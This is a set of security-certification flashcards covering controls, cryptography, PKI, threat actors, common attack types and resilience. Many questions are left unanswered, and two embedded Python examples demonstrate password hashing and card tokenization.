What are the categories of security controls?
What do technical controls include?
What are managerial controls?
What are operational controls?
What do physical controls limit?
What is the purpose of preventive controls?
What are examples of deterrent controls?
What do detective controls do?
What are corrective controls used for?
What are compensating controls?
What is the CIA Triad?
What does confidentiality prevent?
Unauthorized disclosure of information
What is integrity in security?
Data can't be modified without detection
What does availability ensure?
Systems and networks must be operational
What is the role of encryption?
Encode messages for authorized access only
What does hashing do?
Map data of arbitrary length to fixed length
What are digital signatures used for?
Verify the integrity of data
What does availability ensure?
Information is accessible to authorized users.
What is redundancy in services?
Build services that will always be available.
What does fault tolerance mean?
System continues to run even when a failure occurs.
What is the purpose of patching?
Stability and closing security holes.
What is non-repudiation?
You can’t deny what you’ve said; there's no taking it back.
How does a signature add non-repudiation?
It proves you really did sign the contract.
What is proof of integrity?
Verify data does not change; remains accurate and consistent.
What is a hash in cryptography?
Represents data as a short string of text; a fingerprint.
What happens if the data changes?
The hash changes, indicating data integrity is compromised.
What does proof of origin ensure?
Proves the message was not changed and authenticates the source.
How is a digital signature created?
Hash the original plaintext and encrypt it with a private key.
What is the AAA framework?
Identification, Authentication, Authorization, and Accounting.
What is identification in the AAA framework?
This is who you claim to be, usually your username.
What does authentication verify?
Proves you are who you say you are, using passwords and factors.
What does authorization determine?
What access you have based on your identification and authentication.
What does accounting track?
Resources used, such as login attempts.
What are the three main components of security?
What is the purpose of authorization?
To determine access rights based on identification and authentication.
How can a device be authenticated?
By placing a digitally signed certificate on the device.
What is a Certificate Authority (CA)?
An organization that creates and digitally signs certificates for devices.
What is the role of a CA's digital signature?
It is used to validate the certificate.
What does an authorization model help with?
It defines access rights by Roles, Organizations, Attributes, etc.
What is a simple relationship in authorization?
What is Gap Analysis?
A comparison of where you are with where you want to be.
What is the purpose of choosing a framework in Gap Analysis?
To work towards a known baseline.
Name a standard for information security management systems.
ISO/IEC 27001
What does Zero Trust in network security entail?
Everything must be verified; nothing is inherently trusted.
What are key elements of a Zero Trust approach?
What is the Zero Trust principle?
Everything must be verified. Nothing is inherently trusted. Use multi-factor authentication and encryption.
What are the planes of operation in networking?
What is a Policy Enforcement Point (PEP)?
The gatekeeper that allows, monitors, and terminates connections.
What does a Policy Decision Point do?
It makes authentication decisions.
What is the role of a Policy Engine?
Evaluates access decisions based on policy and other information.
What are security zones?
Categorize access based on trust levels: trusted, untrusted, internal, external.
What is the purpose of fencing in physical security?
Build a perimeter to prevent unauthorized access.
What does CCTV stand for?
Closed Circuit Television.
What is the function of access control vestibules?
Control access by managing door operations.
What is two-person integrity/control?
Minimizes exposure to attacks by requiring two individuals for access.
What is the purpose of physical protection at the reception area?
Validates identification of existing employees
What should an access badge include?
How does lighting enhance security?
More light means more security; attackers avoid lit areas
What is the function of infrared sensors?
Detects infrared radiation in both light and dark; common in motion detectors
What do pressure sensors detect?
Detects a change in force; used in floor and window sensors
What is the purpose of honeypots?
Attracts attackers and traps them; creates a virtual world to explore
What are honeynets?
A real network that includes multiple devices; builds a larger deception network
What are honeyfiles?
Files with fake information designed to attract attackers; alerts sent if accessed
What are honeytokens used for?
Tracks malicious actors; adds traceable data to the honeynet
What is change management?
Process for making changes like upgrades, patches, or configuration changes
What is the change approval process?
Formal process to manage change; includes request forms, risk analysis, and approvals
What is the role of ownership in change management?
An individual manages the change process; ensures the process is followed
Who are considered stakeholders in change management?
Individuals or groups impacted by the change; they provide input
What can change management include?
What should be upgraded for shipping?
What is impact analysis?
What risks can occur without change?
What is a sandbox testing environment?
What is a backout plan?
When should changes be scheduled?
What is the standard operating procedure for change management?
What is the role of the technical team in change management?
What is an allow list?
What defines the scope of a change?
How can downtime be minimized?
What is required after implementing new configurations?
What can you do to recover from a power outage?
What should you do with legacy applications?
What are dependencies in system management?
How can documentation become outdated?
What is the purpose of version control?
What is Public Key Infrastructure (PKI)?
What is symmetric encryption?
What is key escrow?
What is important when managing encryption keys?
What is Alice’s public key?
What is ciphertext?
What does Alice use to decrypt ciphertext?
Her private key
What is asymmetric encryption?
Using a public key to encrypt and a private key to decrypt.
What is data at rest?
Data stored on devices like SSD, hard drives, USB drives, cloud storage.
What is an example of full-disk encryption?
BitLocker, FileVault
What is file encryption?
Encrypting individual files using EFS or third-party utilities.
What is transport encryption?
Protecting data while it traverses the network.
What does a VPN do?
Encrypts all data transmitted over the network.
What is the significance of cryptographic keys?
They determine the output of encrypted data, hash values, and digital signatures.
What is the typical length for symmetric keys?
Commonly 128-bit or larger.
What does key stretching do?
Makes a weak key stronger through multiple hashing processes.
What is a challenge of key exchange?
Sharing an encryption key securely over an insecure medium.
What is in-band key exchange?
Sending the key over the network protected by additional encryption.
What is a session key?
A symmetric key shared using asymmetric encryption for data encryption.
How should session keys be implemented?
How is a symmetric key created from asymmetric keys?
Using public and private key cryptography.
What does a Trusted Platform Module (TPM) provide?
What is a Hardware Security Module (HSM) used for?
What is a key management system?
A centralized manager for various keys across services.
What is a secure enclave?
A protected area for secrets, isolated from the main processor.
What is obfuscation?
The process of making something unclear or difficult to understand.
What is steganography?
Concealed writing; hiding information in plain sight.
What are common steganography techniques?
What are yellow dots on printers used for?
Tracking printed documents
What is audio steganography?
Modify audio files to hide messages
What is video steganography?
Use image steganography on video sequences
What is tokenization?
Replace sensitive data with non-sensitive placeholders
How is tokenization used in credit card processing?
Uses a temporary token during payment
What is data masking?
Hide some original data to protect PII
What do hashes represent?
Data as a short string, a message digest
What is a collision in hashing?
Different inputs create the same hash
Why shouldn't you use MD5?
It has a collision problem
What is salting in hashing?
Adding random data to a password before hashing
What is a digital signature?
Proves message integrity and source
What is blockchain?
A distributed ledger for tracking transactions
What is a digital certificate?
Binds a public key with a digital signature
What is a public key certificate?
Binds a public key with a digital signature and other details about the key holder.
What does a digital signature add?
Adds trust; PKI uses Certificate Authorities for additional trust.
What is X.509?
Standard format for digital certificates.
What are typical details in a digital certificate?
What is the root of trust?
An inherently trusted component, such as HSM or Certificate Authority.
What does a Certificate Authority (CA) do?
Digitally signs website certificates, providing trust.
What is a Certificate Signing Request (CSR)?
A request sent to the CA containing a public key to be signed.
What are self-signed certificates?
Internal certificates not signed by a public CA; used within an organization.
What is a wildcard certificate?
Supports many different domains; applies to all server names in a domain.
What is a Certificate Revocation List (CRL)?
Maintained by the CA; contains revoked certificates.
What is OCSP stapling?
Status information is stored on the certificate holder’s server and stapled into the SSL/TLS handshake.
What is OCSP?
Online Certificate Status Protocol for checking certificate revocation.
How is OCSP status included in SSL/TLS?
It is stapled into the handshake and signed by the CA.
What are the steps to create a certificate?
What is a threat actor?
An entity responsible for an event impacting another's safety.
What are the motivations of threat actors?
What defines nation-state attackers?
Government entities with massive resources and high sophistication.
What characterizes unskilled attackers?
Run pre-made scripts, motivated by disruption or data exfiltration.
What is a hacktivist?
A hacker motivated by philosophy or revenge, often sophisticated.
What is an insider threat?
Internal entity motivated by revenge or financial gain, with institutional knowledge.
What is organized crime in cybersecurity?
Professional criminals motivated by money, often very sophisticated.
What is shadow IT?
Working around internal IT, often building unauthorized systems.
What are threat vectors?
What is a common message-based vector?
What is a file-based vector?
What is a vulnerable software vector?
What are unsecure network vectors?
What is the risk of open service ports?
What is the concern with default credentials?
What can removable devices do?
What are some social engineering attacks?
What is war dialing?
What is the purpose of input validation in browsers?
What is call tampering?
What is the significance of cloud usage in Shadow IT?
What expands the attack surface in an application?
More services
What must firewall rules allow?
Traffic to an open port
What should you do with default credentials?
Change them
What provides full control of a device?
The right credentials
What can be tampered with in the supply chain?
Infrastructure or manufacturing process
What is a risk of managed service providers (MSPs)?
Access to multiple customer networks
What was the 2013 Target breach related to?
Vendor access
What can counterfeit networking equipment install?
Backdoors
What is phishing?
Social engineering with spoofing
What should you check to avoid phishing?
The URL
What is business email compromise?
Attackers spoof email sources
What is typosquatting?
A type of URL hijacking
What is vishing?
Voice phishing over phone
What is smishing?
SMS phishing
What is the pretext in impersonation?
Setting a trap with an actor and story
What is a common tactic in identity fraud?
Using someone's personal information
What type of fraud involves credit cards?
Credit card fraud
What can attackers gain access to in bank fraud?
Your bank account
What is bank fraud?
What is loan fraud?
What is government benefits fraud?
How to protect against impersonation?
What is a watering hole attack?
What is required for executing a watering hole attack?
What happened in January 2017?
What is defense-in-depth?
What is misinformation/disinformation?
What is brand impersonation?
What is memory injection?
What is DLL injection?
What does memory forensics do?
What is a buffer overflow?
Overwriting a buffer of memory that spills over into other memory areas.
What do developers need to perform to prevent buffer overflows?
Bounds checking.
What is a race condition?
A programming issue where multiple processes run at the same time and act on the same resource, so the outcome depends on timing and can produce errors.
What does TOCTOU stand for?
Time-of-check to time-of-use attack.
What can cause a reboot loop in systems?
Improper handling of file system problems, as seen in the Mars rover 'Spirit'.
What should you always do when installing software updates?
Keep your operating system and applications updated.
What is a best practice for software updates?
Always have a known-good backup.
Why should you confirm the source of updates?
To avoid installing potentially malicious software.
What is a common issue with malicious updates?
Not every update is equally secure.
What can help ensure the safety of installed applications?
Only install from trusted sources.
What should you do to verify app updates?
Visit the developer’s site directly - Don’t trust random update buttons or files
What do many operating systems require for apps?
They require signed apps - Don't disable security controls
What is the SolarWinds Orion supply chain attack?
Attackers added malicious code to updates - Reported in December 2020
What is a foundational computing platform?
An operating system (OS) - Everyone has one
How complex are operating systems?
Remarkably complex - Millions of lines of code
What is Patch Tuesday?
2nd Tuesday of each month - Normal month of Windows updates
What vulnerabilities were reported on May 9, 2023?
What is a best practice for OS vulnerabilities?
Always update - Monthly or on-demand updates
What is code injection?
Adding your own information into a data stream - Enabled by bad programming
What is SQL injection (SQLi)?
Putting your own SQL requests into an application - Shouldn't be allowed
How can SQL injection be executed?
Often executed in a web browser - Inject in a form or field
What is Cross-site Scripting (XSS)?
A common web app vulnerability - Takes advantage of user trust
What is a non-persistent (reflected) XSS attack?
Web site allows scripts in user input - Attacker emails a link with malicious script
What is a persistent (stored) XSS attack?
Attacker posts a message with payload - Everyone viewing the page gets it
What is a malicious payload?
A payload that spreads quickly to all viewers of a page, making it 'persistent'.
What happens when someone views a malicious message?
It can be posted to their page and propagate further.
What vulnerability did Aaron Guzman discover in Subaru?
A token that never expires, allowing unauthorized access.
What is a potential risk of a valid token?
Allows any service request, including adding an email to another's account.
How can you protect against XSS?
What is firmware?
The operating system inside hardware devices.
What does EOL stand for?
End of life, when a manufacturer stops selling a product.
What is EOSL?
End of service life, no longer supported or patched by the manufacturer.
What are legacy platforms?
Older devices running outdated software that may pose security risks.
What is a significant concern regarding technology EOSL?
Lack of security patches and updates for unsupported products.
What are virtualization vulnerabilities?
What is VM escape?
Breaking out of the VM to interact with the host OS or hardware.
What can you control after escaping the VM?
What happened in March 2017 at Pwn2Own?
What does the hypervisor manage?
The relationship between physical and virtual resources.
What percentage of organizations use MFA for management console users?
76% are not using MFA.
What is a common type of attack in the cloud?
Denial of Service (DoS).
What is authentication bypass?
Exploiting weak or faulty authentication.
What is SQL injection?
Getting direct access to a database.
What is a risk in the supply chain?
Attackers can infect any step along the chain.
What should be considered for service providers?
Ongoing security audits included in the contract.
What was targeted in the Target Corp. breach?
40 million credit cards stolen
How was the HVAC firm infected in the Target breach?
Malware delivered in an email
What kind of credentials were stolen from the HVAC techs?
VPN credentials
What network was used to infect cash registers in the Target breach?
A wide-open Target network
What is a key factor in trusting hardware providers?
Supply chain cyber security
What should be controlled tightly among vendors?
Use a small supplier base
What should security be part of in design?
The overall design
What company was involved in a counterfeit product scandal in July 2022?
Cisco
What should be confirmed during software installation?
Digital signature
What significant attack involved SolarWinds Orion?
SolarWinds supply chain attack
What was compromised in the Solarwinds attack?
Software updates
What common vulnerability involves open permissions?
Leaving a door open for hackers
What should be done to protect admin accounts?
Disable direct login to root accounts
What protocols should be avoided due to lack of encryption?
Telnet, FTP, SMTP, IMAP
What should be used instead of default settings?
Change to custom configurations
What botnet exploits default configurations?
Mirai botnet
What do firewalls manage?
Traffic flows based on port number
What is important to manage access?
What should you do with firewall rulesets?
What are challenges in mobile device security?
What data do mobile devices often contain?
What is jailbreaking/rooting?
What is sideloading?
What are zero-day vulnerabilities?
What is a zero-day attack?
What is malware?
What types of malware exist?
How do you get malware?
What is ransomware?
Malware that encrypts files and demands payment for decryption.
How can you protect against ransomware?
What is a virus?
Malware that can reproduce itself and needs user execution to spread.
How do viruses spread?
Through file systems or networks by executing a program.
What are the types of viruses?
What is a fileless virus?
A stealth attack that operates in memory and avoids detection.
What is a worm?
Malware that self-replicates without user action, spreading via networks.
How do worms spread?
They self-propagate and can take over many systems quickly.
What is spyware?
Malware that spies on users, capturing data like keystrokes.
How can you protect against spyware?
What is bloatware?
Unwanted applications installed by manufacturers that use storage space.
How can you remove bloatware?
What are keyloggers?
Malware that captures keystrokes and sends them to attackers.
What can malware log?
What is a logic bomb?
A malicious code that waits for a predefined event to execute.
What is a time bomb?
A type of logic bomb that activates based on a specific time or date.
What happened on March 19, 2013 in South Korea?
Email with malicious attachment sent; Trojan installed malware.
What did the malware do on March 20, 2013?
Activated logic bomb, deleted storage and master boot record.
What is SCADA?
Supervisory Control and Data Acquisition system used in industrial control.
How can you prevent a logic bomb?
What is a rootkit?
A malicious software that modifies core system files and is often invisible to the OS.
How can you find and remove rootkits?
What are physical attacks?
Attacks that bypass digital security by gaining physical access to systems.
What is brute force in physical security?
Physically pushing through obstructions without needing a password.
What is RFID cloning?
Copying RFID badges or key fobs using duplicators.
What are environmental attacks?
Attacks targeting the operating environment, like HVAC and power systems.
What is a Denial of Service (DoS) attack?
An attack that overloads a service to make it unavailable.
What is a Distributed Denial of Service (DDoS) attack?
Using multiple computers to bring down a service.
What is a botnet?
A network of infected computers controlled by an attacker.
What was the peak infection of the Zeus botnet?
Over 3.6 million PCs.
What is DNS poisoning?
Modifying a DNS server to redirect requests.
What is domain hijacking?
Gaining access to domain registration to control traffic flow.
What is URL hijacking?
Redirecting users from a mistyped URL to a malicious site.
What is typosquatting?
Taking advantage of misspellings in domain names.
What is a wireless deauthentication attack?
A DoS attack that disconnects users from a wireless network.
What does 802.11w address?
Encryption of certain management frames to protect against attacks.
What is RF jamming?
Interfering signals that prevent wireless communication.
What does wireless jamming do?
Prevents wireless communication - Transmits interfering signals - Decreases signal-to-noise ratio
What is the difference between interference and jamming?
Interference is unintentional - Jamming is intentional disruption
What is reactive jamming?
Jamming occurs only when someone else tries to communicate
What is an on-path attack?
Formerly known as man-in-the-middle - Redirects traffic without detection
What does ARP poisoning do?
An on-path attack on the local IP subnet - ARP lacks security
What is a replay attack?
An attacker reuses transmitted information - Requires raw network data access
What are browser cookies?
Stored information by the browser - Used for tracking and session management
What is session hijacking?
An attacker intercepts a session ID - Gains access using victim's credentials
What is pass the hash?
An attacker captures username and password hash - Uses them to authenticate as the victim
What is malicious code?
Code used to exploit vulnerabilities - Can be delivered through various techniques
What are ways to get into a well-secured system?
What are types of malicious code?
What protects against malicious code?
What is WannaCry ransomware?
What is privilege escalation?
What mitigates privilege escalation?
What are common injection attack types?
What is the purpose of bounds checking?
What is the role of HTTPS in security?
What are tools for information gathering?
What is cross-site scripting?
What is CVE-2023-29336?
Win32k Elevation of Privilege Vulnerability
Which systems are affected by Win32k Kernel driver vulnerability?
What privileges can an attacker gain from CVE-2023-29336?
SYSTEM privileges
What are cross-site requests?
Legitimate requests from different sources like websites and videos.
What does client-side code do?
Renders the page on the screen (HTML, JavaScript)
What does server-side code do?
Performs requests from the client (HTML, PHP)
What is Cross-site Request Forgery (CSRF)?
One-click attack that exploits user trust in a web application.
What is a significant oversight in web application development regarding CSRF?
Lack of anti-forgery techniques.
What is directory traversal?
Reading files from a web server outside the website’s directory.
What can attackers exploit in directory traversal?
Badly written web application code.
What is a birthday attack?
Finding two different plaintexts with the same hash value.
What is a hash collision?
Same hash value for two different plaintexts.
What vulnerability was identified with MD5?
Collisions identified in 1996.
What is a downgrade attack?
Forcing systems to use weaker encryption methods.
What vulnerability did the POODLE attack exploit?
TLS vulnerability that forced clients to fall back to SSL 3.0.
Why won't modern browsers fall back to SSL 3.0?
Due to significant cryptographic vulnerabilities.
What is SSL stripping?
An on-path attack that rewrites URLs from HTTPS to HTTP.
What is a plaintext password?
A password stored without encryption, making it readable.
What should you do if your application saves passwords as plaintext?
Get a better application that hashes passwords.
What is hashing a password?
Representing data as a fixed-length string, creating a message digest.
What is an example of a common hashing algorithm?
SHA-256, used in many applications.
What is a spraying attack?
Trying common passwords across multiple accounts to avoid lockouts.
What is a brute force attack?
Trying every possible password combination until the correct one is found.
What happens during an online brute force attack?
Attempts to log in repeatedly, often leading to account lockouts.
What is an indicator of compromise (IOC)?
An event indicating a potential intrusion, such as unusual network activity.
What can cause an account lockout?
Exceeded login attempts or administrative disabling of the account.
What does concurrent session usage refer to?
Multiple logins from different locations by the same user.
What is an attacker's goal regarding blocked content?
To remain undetected in the system for as long as possible.
What is a common reason attackers want to stay in a system?
What should you look for to prevent blocked content?
What types of segmentation can be used in a network?
What is the purpose of access control lists (ACLs)?
What can be included in ACL configurations?
What is an example of a permission in an ACL?
What is a unique method to allow applications in an allow list?
What does 'impossible travel' indicate in security?
What should be monitored for signs of an attack?
What does out-of-cycle logging refer to?
What can missing logs indicate?
What might attackers do with company data?
What may occur in conjunction with ransomware?
What is incredibly important for system security?
How often should updates be performed?
What does full disk encryption (FDE) do?
What is an example of full disk encryption?
What should rights and permissions be set to?
What must user accounts be limited to?
What is needed for configuration enforcement?
What should decommissioning policies include?
What is a method of threat protection?
What does a host-based firewall do?
What does system hardening include?
What is an example of file system encryption?
What type of monitoring aggregates information from devices?
What is the goal of encryption in data protection?
What should be included in extensive checks during configuration enforcement?
What does a host-based Intrusion Prevention System (HIPS) do?
What should you do with open ports and services?
Why should you change default passwords?
What is the risk of unnecessary software?
What is a cloud responsibility matrix?
What are hybrid cloud considerations?
What is infrastructure as code?
What is serverless architecture?
What are microservices?
What is a monolithic application?
One big application that does everything, containing user interface, business logic, and data input/output.
What are APIs used for in microservices?
APIs serve as the 'glue' for microservices, allowing them to work together as a single application.
What are the benefits of microservices?
What is physical isolation in network infrastructure?
Devices are physically separate, requiring direct connections or switches for communication.
What is the purpose of VLANs?
VLANs provide logical segmentation, separating networks without physical isolation.
What are the three planes of SDN?
What is a centralized approach in security management?
Centralizes security management for correlated alerts and consolidated log analysis.
What is virtualization?
Running multiple operating systems on the same hardware, with each application instance having its own OS.
What are the challenges of a monolithic architecture?
Large codebase and change control challenges due to everything being in one application.
What is the responsibility matrix in microservices?
Defines how different components interact, including clients, APIs, and microservices.
What are the security concerns between on-premises and cloud?
On-premises offers full control but higher costs; cloud is centralized and generally less expensive.
What is an application container?
A standardized unit of software containing everything needed to run an application.
What does a container provide?
Isolated processes in a sandbox; self-contained applications.
What is an IoT sensor used for?
Heating and cooling, lighting.
What are examples of smart devices?
Home automation, video doorbells.
What is a real-time operating system (RTOS)?
An OS with a deterministic processing schedule, critical for industrial equipment.
What defines embedded systems?
Hardware and software designed for a specific function or part of a larger system.
What is high availability (HA)?
Systems that are always on and available, often requiring redundancy.
What is the importance of availability in IT?
System uptime is crucial for accessing data and completing transactions.
What does resilience refer to in IT?
The ability to maintain availability and recover quickly after an incident.
What is MTTR?
Mean Time to Repair, a metric for recovery time.
What factors contribute to cost in IT infrastructure?
Initial installation, ongoing maintenance, and repair costs.
What is a key factor in ongoing maintenance?
Annual ongoing cost
What are replacement or repair costs?
You might need more than one
What are the tax implications of expenses?
Operating or capital expense
What is critical for responsiveness in applications?
Speed is an important metric
What contributes to application responsiveness?
All parts of the application contribute
What does scalability refer to?
How quickly and easily can we increase or decrease capacity?
What is essential for ease of deployment?
Consider orchestration / automation
What method can be used for risk transference?
Transfer the risk to a third-party
What is a critical aspect of ease of recovery?
How easily can you recover?
What does patch availability involve?
Bug fixes, security updates, etc.
What happens if patching isn’t an option?
Embedded systems may need additional security controls
What is a foundational element of infrastructure?
Power requirements
What is the compute engine?
More than just a single CPU
What is the purpose of firewalls in a network?
Separate trusted from untrusted
What do security zones simplify?
Security policies
What is an attack surface?
Every point an attacker could use to get in; by analogy, how many ways are there into your home?
What can be a vulnerability in applications?
Open ports
What are common vulnerabilities in security?
How to minimize the attack surface?
What contributes to security?
What is fail-open in security?
Data continues to flow when a system fails.
What is fail-closed in security?
Data does not flow when a system fails.
What is the difference between active and passive monitoring?
What does an Intrusion Prevention System (IPS) do?
Watches network traffic and stops intrusions before they enter the network.
What is a jump server?
A highly-secured device that provides access to protected network zones.
What is the function of a proxy?
Sits between users and external networks to handle requests on behalf of users.
What is a forward proxy?
An internal proxy used to protect and control user access to the Internet.
What is an open proxy?
A third-party, uncontrolled proxy that can pose significant security concerns.
What is a reverse proxy?
Handles inbound traffic from the Internet to internal services.
What is an application proxy?
A proxy that understands how an application works, often used for HTTP.
What is port security?
Authentication methods to control access on networks, used in both wired and wireless networks.
What does EAP stand for?
Extensible Authentication Protocol, an authentication framework.
What is IEEE 802.1X?
Port-based Network Access Control (NAC) that requires authentication before network access.
What are the roles in IEEE 802.1X?
Supplicant (the client device), authenticator (the switch or access point), and authentication server (e.g., a RADIUS server).
What is load balancing?
Distributing load across multiple servers to ensure fault tolerance and performance.
What is active/active load balancing?
All servers are active and share the load; provides fault tolerance and fast convergence.
What is active/passive load balancing?
Some servers are active while others are standby; passive servers take over if active ones fail.
What are sensors in networking?
Data sources built into or attached to network devices, such as intrusion prevention systems, firewall logs and authentication logs.
What are collectors in networking?
Devices that gather data from sensors, such as SIEM consoles and syslog servers.
What is the role of a firewall?
Controls the flow of network traffic, protecting sensitive materials and controlling content.
What does a firewall control?
What are the protections provided by firewalls?
What is the difference between OSI layer 4 and OSI layer 7?
Layer 4 (transport) firewalls decide on addresses and TCP/UDP ports; layer 7 (application) firewalls inspect the application content itself (e.g., HTTP requests), as an NGFW does.
What does NGFW stand for?
Next-Generation Firewall
What is a VPN?
Virtual Private Network
What is the purpose of a web application firewall (WAF)?
What is the function of SSL/TLS VPN?
What is SD-WAN?
Software Defined Networking in a Wide Area Network
What does SASE stand for?
Secure Access Service Edge
What does a Unified Threat Management (UTM) appliance include?
What is the role of a VPN concentrator?
Encryption/decryption access device
What is content filtering in firewalls?
What are the types of data classifications?
What is regulated data?
What is trade secret?
What defines legal information?
What types of financial information exist?
What is the difference between human-readable and non-human readable data?
What are examples of hybrid data formats?
What does classifying sensitive data involve?
What are the data classifications?
What is Proprietary data?
Data that is the property of an organization, may include trade secrets, often unique to an organization.
What does PII stand for?
Personally Identifiable Information, data used to identify an individual.
What is included in PHI?
Health information associated with an individual, including health status and care records.
What is data at rest?
Data stored on a device like hard drives or SSDs, often encrypted.
What is data in transit?
Data transmitted over a network, also known as data in-motion, requires transport encryption.
What is data in use?
Data actively processing in memory, usually decrypted, can be vulnerable to attacks.
What is data sovereignty?
Data residing in a country is subject to that country's laws, for example GDPR for data in the EU.
What is geolocation used for?
Tracks location details, can manage data access based on user location.
What is geofencing?
Automatically allows or restricts access based on user location, e.g., office proximity.
What is the purpose of encryption?
To encode information into unreadable data, converting plaintext to ciphertext.
What is hashing?
Represents data as a short string of text, a one-way trip creating a message digest.
What is confusion in encryption?
The ciphertext is drastically different from the plaintext: each bit of the output depends on several parts of the key, so the relationship between key and ciphertext is obscured.
What is a key feature of hashing?
It's a one-way trip; impossible to recover the original message from the digest.
What is the purpose of hashing?
Used to store passwords and verify document integrity.
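The hashing cards above describe three properties: a fixed-length fingerprint, a one-way trip, and a digest that changes whenever the data changes. The following Python script is an added example (not from the original notes) that shows all three with the standard library: SHA-256 as the integrity fingerprint, the avalanche effect on a one-character change, and salted, iterated PBKDF2 for password storage. The sample strings and the 600,000 iteration count are this example's own choices.

```python
import hashlib
import hmac
import os


def sha256_hex(data: bytes) -> str:
    """Fixed-length fingerprint of arbitrary-length data."""
    return hashlib.sha256(data).hexdigest()


def verify_integrity(data: bytes, expected_hex: str) -> bool:
    """Recompute the digest and compare in constant time."""
    return hmac.compare_digest(sha256_hex(data), expected_hex)


def bits_changed(hex_a: str, hex_b: str) -> int:
    """Count the bits that differ between two hex digests (avalanche effect)."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def hash_password(password: str, salt: bytes = None, iterations: int = 600_000) -> str:
    """Store passwords as a salted, iterated hash (PBKDF2-HMAC-SHA256), never as plaintext.

    The salt makes identical passwords hash differently; the iteration count
    (an example value here) slows down offline guessing.
    """
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def check_password(password: str, stored: str) -> bool:
    """Re-derive with the stored salt and iteration count.

    The stored value is the digest only: it cannot be turned back into the password.
    """
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(candidate.hex(), dk_hex)


if __name__ == "__main__":
    original = b"Transfer 100 EUR to account 12345"
    fingerprint = sha256_hex(original)
    tampered = b"Transfer 900 EUR to account 12345"
    print("original digest :", fingerprint)
    print("tampered digest :", sha256_hex(tampered))
    print("bits changed    :", bits_changed(fingerprint, sha256_hex(tampered)))
    print("tampered passes integrity check?", verify_integrity(tampered, fingerprint))
    record = hash_password("correct horse battery staple")
    print("stored record   :", record)
    print("right password  :", check_password("correct horse battery staple", record))
    print("wrong password  :", check_password("wrong", record))
```

Changing a single digit in the message flips roughly half of the 256 digest bits, which is what makes the digest usable as a fingerprint; the password record reveals the algorithm, salt and digest but not the password.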
What is obfuscation?
Making something understandable very difficult to understand.
What does obfuscation help prevent?
Makes it harder for an attacker to read the code and find security holes; it hides them but does not fix them.
What is masking?
A type of obfuscation that hides some original data.
What does masking protect?
Personally Identifiable Information (PII) and other sensitive data.
What is tokenization?
Replacing sensitive data with a non-sensitive placeholder.
How is tokenization used in credit card processing?
Uses a temporary token during payment to prevent misuse of captured card numbers.
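Masking and tokenization are easy to confuse, so here is an added Python example (not from the original notes) that puts the two side by side for a card number: masking produces an irreversible display string, while tokenization swaps the real number for a random placeholder that only the vault can map back. The in-memory vault, the sample card number and the single-use behaviour are this example's own assumptions; a real payment processor's vault is a hardened, audited service.

```python
import secrets


def mask_pan(pan: str, visible: int = 4) -> str:
    """Masking: keep only the last few digits for display. Nothing can recover the rest."""
    digits = pan.replace(" ", "")
    return "*" * (len(digits) - visible) + digits[-visible:]


class TokenVault:
    """Tokenization: replace the real card number (PAN) with a random placeholder.

    The token-to-PAN mapping exists only inside the vault (a dict here, constructed
    for the example). A token captured from a merchant, a log or the network is
    worthless without access to the vault.
    """

    def __init__(self):
        self._token_to_pan = {}

    def tokenize(self, pan: str) -> str:
        digits = pan.replace(" ", "")
        while True:
            # Keep the last four digits so receipts still make sense; the leading
            # digits are random, so the token carries no information about the PAN.
            random_part = "".join(str(secrets.randbelow(10)) for _ in range(len(digits) - 4))
            token = random_part + digits[-4:]
            if token != digits and token not in self._token_to_pan:
                self._token_to_pan[token] = digits
                return token

    def redeem(self, token: str) -> str:
        """Single-use: the payment processor looks the PAN up once and the token dies.

        A replayed or stolen token raises KeyError instead of charging the card again.
        """
        return self._token_to_pan.pop(token)


if __name__ == "__main__":
    pan = "4111 1111 1111 1111"  # constructed test number, not a real card
    print("masked for display :", mask_pan(pan))
    vault = TokenVault()
    token = vault.tokenize(pan)
    print("token sent to merchant:", token)
    print("vault redeems to     :", vault.redeem(token))
    try:
        vault.redeem(token)
    except KeyError:
        print("replayed token rejected")
```

Masking belongs on receipts, screens and logs; tokenization belongs wherever a system must later act on the real value (charge the card) without ever storing it itself.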
What is the benefit of segmentation?
Separating data to reduce risk of a single breach affecting all data.
What does high availability (HA) mean?
Always on, always available system.
What is server clustering?
Combining two or more servers to operate as a single large server.
What is the purpose of load balancing?
Distributing load across multiple servers to optimize performance.
What is a hot site?
An exact replica of a primary site, constantly updated.
What is a cold site?
What is a warm site?
What is platform diversity?
What are multi-cloud systems?
What is continuity of operations planning (COOP)?
What is capacity planning?
What is the role of people in capacity planning?
What technology can help in capacity planning?
What is recovery testing?
What are tabletop exercises?
What can be costly and time-consuming in disaster preparedness?
Disaster drills
What is a method to assess disaster response without physical drills?
Tabletop exercises
What is often inevitable in infrastructure?
Failures
What should be created to ensure operational continuity during failures?
Redundant infrastructure
What should be tested with a simulated event?
Internal security
What is a method to test user security awareness?
Phishing email attacks
What does parallel processing improve?
Performance and recovery
What is incredibly important for data recovery?
Backups
What are the two types of backups?
Onsite and offsite backups
What is a benefit of offsite backups?
Data is available after a disaster
What should backup data be protected with?
Encryption
What is the foundation of technology that needs proper planning?
Power
What device provides short-term backup power?
Uninterruptible Power Supply (UPS)
What is needed for long-term power backup?
Generators
What is a snapshot in virtual environments?
An instant backup of an entire system
How often should you take a snapshot?
What is replication in data backup?
What is journaling in data storage?
What are secure baselines?
How should you deploy baselines?
Why is hardening important?
What is critical for mobile devices security?
What is essential for workstations security?
What should be automated in firmware and patch management?
Patch installation on a regular cadence (monthly is common).
Which system should be connected for policy management?
Active Directory group policy
Why should unnecessary software be removed?
To limit threats
What are examples of network infrastructure devices?
What type of devices have embedded OS?
Purpose-built devices
What should be configured for authentication on network devices?
Non-default credentials and the device's own authentication options (custom authentication methods) instead of the factory defaults.
What should be checked with the manufacturer?
Security updates
What should be secured in cloud infrastructure?
Cloud management workstation
What principle should be applied to cloud services?
Least privilege
What should be configured for devices accessing the cloud?
Endpoint Detection and Response (EDR)
What is a recommended backup strategy for cloud data?
Cloud to Cloud (C2C)
What types of servers are there?
What must be monitored and secured on servers?
Anti-virus and anti-malware
What does SCADA stand for?
Supervisory Control and Data Acquisition
What is essential for SCADA systems?
Extensive segmentation
What are embedded systems designed for?
Specific functions
What is a characteristic of RTOS?
Deterministic processing schedule
